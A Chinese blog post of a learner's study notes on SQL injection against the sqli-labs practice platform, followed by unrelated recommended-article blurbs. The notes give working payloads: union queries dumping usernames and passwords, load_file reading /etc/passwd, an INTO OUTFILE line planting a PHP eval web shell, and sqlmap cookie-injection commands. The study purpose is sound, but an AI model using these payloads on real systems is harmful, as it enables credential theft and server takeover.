web安全入门功法通关秘籍第三天打卡

最新推荐文章于 2025-08-04 23:14:52 发布
最新推荐文章于 2025-08-04 23:14:52 发布
阅读量264 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/the_world_go/article/details/106724350
本文详细介绍了SQL注入的原理及手法,包括手工注入技巧、利用SQLmap自动化工具、GET和POST型注入,以及如何通过联合查询、爆表、爆字段和爆数据等手段进行攻击。同时,探讨了如何读取敏感文件和写入Web Shell,并提供了具体的SQL语句实例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天两小时的课程内容要素过多,简要总结一下,以便接下来的学习
主要是有关sql注入的内容

1,sql的手工注入
通过给服务器提交不正常逻辑的sql语句来达到攻击的方式

在URL:id=33 后边加入单引号,发现sql语句报错(可以用来找数据库类型)

可以用and 1=1 ??and 1=2来判断注入点是否存在
通过order by的报错来猜测字段数
sql注入的联合查询 先要让前置的查询差不出结果
?id=-33 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 //注意联合查询需将前置查询为空
这里id=-33明显不存在 所以查询为空可以执行后面的内容了

一些常见的对数据库的操作
爆表
id=-33 union select TABLE_SCHEMA, TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘库名’
爆字段
id=-33 union select TABLE_NAME, COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘表名’
爆数据
id=-33 union select 1,2,binary(group_concat(username," ",password)),4,5,6,7,8,9,10,11,12,13,14,15
from cms_users

读取文件使用 load_file() 函数
id=-33 union select 1,2,load_file("/etc/passwd"),4,5,6,7,8,9,10,11,12,13,14,15

SQL语句写shell通过SQL注入select into outfile实现,如:
1’ union select 1,’<?php eval($_POST[a]);?>’ INTO OUTFILE ‘/var/www/tmp/nb.php’#

2,get和post型注入
各种参数

在这里插入图片描述
先利用bp抓包记录日记文件
读取文件
使用–data传递post数据
用于判断注入点是否存在

基于mysql的cookie的注入
http://192.168.30.88/sqli-labs/sqli-labs/Less-20/index.php
注入security数据库拿到的用户名和密码登录

对COOKIE值进行SQL注入
探测,需要设置level=2。 1:会检测POST和GET。 2:会检测COOKIE。
3:会测试User-Agent和
Referer。
最高为5,一般不常用(会加入无用的数据)
sqlmap.py -u http://192.168.30.88/sqli-labs/sqli-labs/Less-20/ --COOKIE
“uname=admin” --level=2
之后的枚举信息和权限操作,皆在后面加对应参数即可。例如查询数据库名 --dbs
sqlmap.py -u http://192.168.30.88/sqli-labs/sqli-labs/Less-20/ --COOKIE
“uname=admin” --level=2 --dbs

3、sqlmap工具
基于2.x版本的python

下载li-labs注入学习平台
在学习时可以在网站源码中输出注入的语句
查看实际注入的内容

阿巴阿巴阿巴(一脸懵逼)
明日继续

the_world_go
关注
【数据结构功法】第1话 · 数据结构入门竟如此简单?
kikokingの比特宇宙
03-23 1万+
从今天开始,我将正式开启一个新的打卡专题——【数据结构·水滴计划】,没错!这是今年上半年的一整个系列计划!本专题目的是通过百天刷题计划,通过题目和知识点串联的方式,刷够1000道题!完成对数据结构相关知识的全方位复习和巩固;同时还配有专门的笔记总结和文档教程哦!想要搞定,搞透数据结构的同学,欢迎订阅本专栏!.........
如何零代码玩转Web组态?实战功法秘籍来了
h123_b的博客
05-27 881
web组态可视化编辑器为工程用户提供了二次开发的可能,不用编程、不用写代码,通过可视化界面即可生成web页面开发出一个应用系统来,大量实际的应用场景,在能管、物联网、配电等重要组态场景的搭建都有广泛的应用。 而市面上现有的大部分传统桌面端组态软件,用起来门槛较高,且没办法跨平台协作。还会时常因为自带图元少、动效单一导致可视化效果差,而在设备数据采集环节,也会因为缺乏统一标准,导致实施繁琐无法灵活改动。 例如,发电系统,发电是由副励磁机(永磁机)发出高频电流,副励磁机发出的电流经过励磁盘整流,再送到主励磁
web安全入门功法通关秘籍第四天打卡
the_world_go的博客
06-17 361
web安全之文件上传漏洞 在把文件上传到web服务器时,如果没有对文件进行检查限制,就有可能导致木马进入web服务器,造成控制破坏。 ** 原因** (1)文件上传时检查不严 比如应用在文件上传时根本没有进行文件格式检查,导致攻击者可以直接上传恶意文件。 或应用仅仅在客户端进行了检查,而在专业的攻击者眼里几乎所有的客户端检查都等于没有检查,攻击者可以通过NC,Fiddler等断点上传工具轻松绕过客户端的检查。 (2)文件上传后修改文件名时处理不当 一些应用在服务器端进行了完整的黑名单和白名单过滤,在修改已上
web安全入门功法通关秘籍第五天打卡
the_world_go的博客
06-19 286
JavaScript基本语法 JavaScript 是世界上最流行的编程语言。这门语言可用于 HTML 和 web,如需在 HTML 页面 中插入 JavaScript,使用 之间的 JavaScript。脚本可被放置在 HTML 页面的 和 部分中,也可以把脚本保存到外 部文件中 数据类型: Boolean(布尔) Number(数字) String(字符串) Undefined(未定义) Null(空对象) Object(对象类型) 分号用于分隔 JavaScript 语句。 通常我们在每条可执行
WEB安全攻防入门教程(非常详细),从零基础入门到精通,看完这一篇就够了
Python_0011的博客
01-11 2018
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。最后的最后,祝每一位看到这里的朋友都能被世界善待,收获自己想要的offer。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。推荐指数:★★★★★。推荐指数:★★★★★。推荐指数:★★★★★。推荐指数:★★★★★。
Web前端入门第 62 问:JavaScript 循环结构注意事项
weixin_33824385的博客
07-05 17
如果说算法是程序的灵魂,那么循环可以算是算法的基石,很多常见的算法都需要使用循环实现,比如各种数组排序算法、查找算法、最短路径算法等等。循环是程序中的必修课,任何编程语言都有它的身影。原创作者: linx转载于: https://www.cnblogs.com/linx/p/189087251.Web前端入门第1问:英语是否很重要?有哪些前置条件?02-282.Web前端入门第2问:前端开发是什么?与后端、全栈的区别是什么?一个完整的Web项目有哪些角色参与?02-28。
Web前端入门第 63 问:JavaScript 图解 for 循环执行顺序
weixin_40595340的博客
07-06 16
单个 for 循环很简单,但算法中的循环可不止一个,层层嵌套下来之后,再叠加上递归 Buff,那代码看起来就打脑壳了,所以搞算法的大佬们都值得膜拜~~// 数组小于 1 不用排序,直接返回即可return arr;// 使用中间元素作为比较的基准值// 左分区// 右分区// 等于基准点的元素// 遍历给左右分区i++) {// 小于基准点放在左边// 大于基准点方在右边} else {// 合一并且对左右分区,递归处理// 使用原创作者: linx。
Web前端入门第 25 问:CSS 中 11 种颜色写法
weixin_29711757的博客
05-12 47
共9 种常见写法,涵盖颜色关键字、十六进制、RGB/RGBA、HSL/HSLA 和 HWB。其他高级颜色空间(如lab()lch())根据兼容情况,选择性使用。原创作者: linx转载于: https://www.cnblogs.com/linx/p/188072921.Web前端入门第1问:英语是否很重要?有哪些前置条件?02-282.Web前端入门第2问:前端开发是什么?与后端、全栈的区别是什么?一个完整的Web项目有哪些角色参与?02-28。
Web前端入门第 52 问:JavaScript 的应用领域
weixin_41334719的博客
07-17 8
JavaScript 的生态版图可以说非常丰满,选择一个您感兴趣的方向专研下去必有一番成就。当然在走向兴趣的道路之前,咱们还需要先了解 JS 的基础语法,没有基础,任何高楼幻想都是泡影~~原创作者: linx转载于: https://www.cnblogs.com/linx/p/188753651.Web前端入门第1问:英语是否很重要?有哪些前置条件?02-282.Web前端入门第2问:前端开发是什么?与后端、全栈的区别是什么?一个完整的Web项目有哪些角色参与?02-28。
Web前端入门第 53 问:JavaScript 的各种调试方法
weixin_30446393的博客
05-15 39
调试手段不仅仅可以用于开发调试,还能用于线上环境问题定位,模拟程序的各种异常情况,提升程序的健壮性。原创作者: linx转载于: https://www.cnblogs.com/linx/p/188772591.Web前端入门第1问:英语是否很重要?有哪些前置条件?02-282.Web前端入门第2问:前端开发是什么?与后端、全栈的区别是什么?一个完整的Web项目有哪些角色参与?02-283.Web前端入门第3问:前端需要学习哪些技术?02-28。
Web前端入门第 24 问:CSS 单位
weixin_42440389的博客
05-30 24
svh/lvhex。cmmminptpc。原创作者: linx转载于: https://www.cnblogs.com/linx/p/188054041.Web前端入门第1问:英语是否很重要?有哪些前置条件?02-282.Web前端入门第2问:前端开发是什么?与后端、全栈的区别是什么?一个完整的Web项目有哪些角色参与?02-283.Web前端入门第3问:前端需要学习哪些技术?02-28。
【C语言功法手册】第三话 · 循环结构一点就通
kikokingの比特宇宙
05-13 1346
从今天开始,我将正式开启一个新的打卡专题——《C语言百炼成神计划》,没错!百炼成神,目的是通过百天刷题计划,通过题目和知识点串联的方式,完成C语言的复习和巩固;后期还会配有专门的笔记总结和文档教程哦!想要搞定,搞透C语言的同学,欢迎持续关注。...............
【数据结构功法】第3话 · 顺序表快速入门
kikokingの比特宇宙
04-21 3946
从今天开始,我将正式开启一个新的打卡专题——【数据结构·水滴计划】,没错!这是今年上半年的一整个系列计划!本专题目的是通过百天刷题计划,通过题目和知识点串联的方式,刷够1000道题!完成对数据结构相关知识的全方位复习和巩固;同时还配有专门的笔记总结和文档教程哦!想要搞定,搞透数据结构的同学,欢迎订阅本专栏!.....................
知攻善防web1应急响应靶机
2201_75785401的博客
12-04 896
知攻善防web1靶场练习
MySQL进阶:(第二篇)索引的结构、分类、语法
m0_73073987的博客
08-01 1115
本文系统介绍了MySQL索引的核心概念与实现原理。首先阐述了索引作为高效数据检索的有序数据结构,对比了有无索引的查询差异,并分析了索引在提升查询效率(降低IO和CPU消耗)与占用空间、影响更新操作之间的优缺点。重点剖析了多种索引数据结构:二叉树、红黑树在数据量大时的深度问题,B-Tree的多路平衡特性,以及MySQL优化后的B+Tree(增加相邻节点指针提升区间查询)。同时介绍了哈希索引的局限性和存储引擎支持情况,解释了InnoDB选择B+Tree的原因。最后详细说明了聚集索引的选取规则、索引分类及创建语法
Ubuntu 下 MySQL 离线部署教学(含手动步骤与一键脚本)
最新发布
The God Of BigData 的博客
08-04 180
本文介绍了在Ubuntu 20.04/22.04无网络环境下部署MySQL的方法。首先需要准备虚拟机环境和下载依赖包,建议初学者先手动部署以理解原理。主要步骤包括:挂载ISO文件、安装MySQL、启动服务、设置root密码和远程访问配置。文中提供了详细的命令操作,并推荐使用自动部署脚本mysql_offline_deploy.sh完成批量部署。脚本包含挂载ISO、安装MySQL安全设置和开放端口等功能。最后提供了补充建议,如扩展依赖包和使用tar.gz格式替代ISO等方案。
菜鸟集团招Java研发啦
jobleap.cn求职助手首页
08-04 222
菜鸟集团招聘JAVA研发工程师,工作地点杭州。岗位职责包括分布式系统开发、高性能服务端程序设计、搜索引擎模块实现及海量数据处理。要求精通JAVA等编程语言,熟悉网络编程、Linux环境和数据库技术,具备扎实的算法基础。优先考虑有互联网实习经历、ACM竞赛获奖或学术成果的候选人。该职位面向具备良好学习能力和团队协作精神的技术人才。
mysql 实现列转行和行转列
质量不太好的博客
08-04 305
mysql 实现列转行和行转列
人大金仓数据库Kingbase主备集群搭建和部署
求知若渴,虚心若愚。
08-01 1053
本文介绍了人大金仓数据库主备集群的安装部署流程。主要内容包括:1)从官网下载数据库软件和授权文件;2)配置主备服务器207和209的免密互信;3)修改install.conf配置文件,设置集群路径、IP地址、数据库参数等;4)执行集群安装脚本并验证状态;5)测试主备数据同步,通过创建测试表和插入数据验证主备一致性。部署过程中需注意服务器免密配置和集群文件夹清理问题,最后通过repmgr命令检查集群运行状态。
plsql功法
03-26
### PL/SQL 的基本使用方法 PL/SQL 是一种强大的过程化语言,主要用于开发 Oracle 数据库中的存储过程、函数、触发器和包。以下是关于 PL/SQL 基本使用方法的一些重要知识点: #### 1. **PL/SQL 结构** PL/SQL 程序通常由三个部分组成:声明部分(可选)、执行部分(必选)和异常处理部分(可选)。 ```sql DECLARE -- 变量声明区域 BEGIN -- 执行逻辑区域 EXCEPTION -- 异常处理区域 END; ``` 这种结构使得开发者可以清晰地定义变量、编写逻辑并捕获可能发生的错误。 #### 2. **变量与数据类型** PL/SQL 支持多种内置的数据类型,例如 `NUMBER`、`VARCHAR2` 和 `DATE` 等。还可以通过 `%TYPE` 或 `%ROWTYPE` 来引用表列的类型[^2]。 示例代码: ```plsql DECLARE v_employee_id employees.employee_id%TYPE; -- 定义与表字段相同类型的变量 v_salary NUMBER(8, 2); -- 数字型变量 BEGIN SELECT employee_id, salary INTO v_employee_id, v_salary FROM employees WHERE rownum = 1; DBMS_OUTPUT.PUT_LINE('Employee ID: ' || v_employee_id || ', Salary: ' || v_salary); END; ``` #### 3. **控制结构** PL/SQL 提供了丰富的控制结构来实现条件判断和循环操作。常用的有 `IF...THEN...ELSE` 和 `LOOP` 系列语句。 ##### IF 判断 ```plsql DECLARE v_grade CHAR(1) := 'A'; BEGIN IF v_grade = 'A' THEN DBMS_OUTPUT.PUT_LINE('Excellent'); ELSIF v_grade = 'B' THEN DBMS_OUTPUT.PUT_LINE('Good'); ELSE DBMS_OUTPUT.PUT_LINE('Unknown Grade'); END IF; END; ``` ##### 循环 ```plsql DECLARE i INT := 1; BEGIN LOOP EXIT WHEN i > 5; -- 当满足退出条件时跳出循环 DBMS_OUTPUT.PUT_LINE('Iteration: ' || i); i := i + 1; END LOOP; END; ``` --- ### PL/SQL 编程技巧 为了提高 PL/SQL 开发效率和性能,以下是一些常见的编程技巧: #### 1. **批量处理** 利用游标或集合操作减少单条记录的操作次数,提升性能。例如,可以通过 `FORALL` 实现批量化 DML 操作。 ```plsql DECLARE TYPE emp_ids_t IS TABLE OF employees.employee_id%TYPE INDEX BY PLS_INTEGER; emp_ids emp_ids_t; BEGIN SELECT employee_id BULK COLLECT INTO emp_ids FROM employees WHERE department_id = 10; FORALL i IN INDICES OF emp_ids UPDATE employees SET salary = salary * 1.1 WHERE employee_id = emp_ids(i); COMMIT; END; ``` #### 2. **索引表与嵌套表** 合理使用索引表(Index-by Table)或嵌套表(Nested Table),可以在内存中缓存大量数据以加速计算。 ```plsql DECLARE TYPE nested_table_type IS TABLE OF VARCHAR2(100); my_nested_table nested_table_type := nested_table_type(); BEGIN my_nested_table.EXTEND(3); my_nested_table(1) := 'Value1'; my_nested_table(2) := 'Value2'; my_nested_table(3) := 'Value3'; FOR i IN 1..my_nested_table.COUNT LOOP DBMS_OUTPUT.PUT_LINE(my_nested_table(i)); END LOOP; END; ``` #### 3. **异常处理** 良好的异常处理机制可以帮助程序更好地应对意外情况。建议为常见错误设置自定义消息。 ```plsql BEGIN INSERT INTO non_existent_table VALUES (1); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Error Code: ' || SQLCODE || ', Error Message: ' || SQLERRM); END; ``` #### 4. **优化查询** 尽量避免在循环内部多次调用数据库操作,而是采用绑定变量或子查询的方式一次性完成任务。这有助于降低上下文切换开销。 --- ### 示例:创建一个简单的存储过程 下面是一个完整的存储过程示例,展示了如何封装业务逻辑以便重复使用。 ```plsql CREATE OR REPLACE PROCEDURE update_employee_salary ( p_department_id IN employees.department_id%TYPE, p_percentage_increase IN NUMBER DEFAULT 10 ) AS BEGIN UPDATE employees SET salary = salary * (1 + p_percentage_increase / 100) WHERE department_id = p_department_id; COMMIT; END; / ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值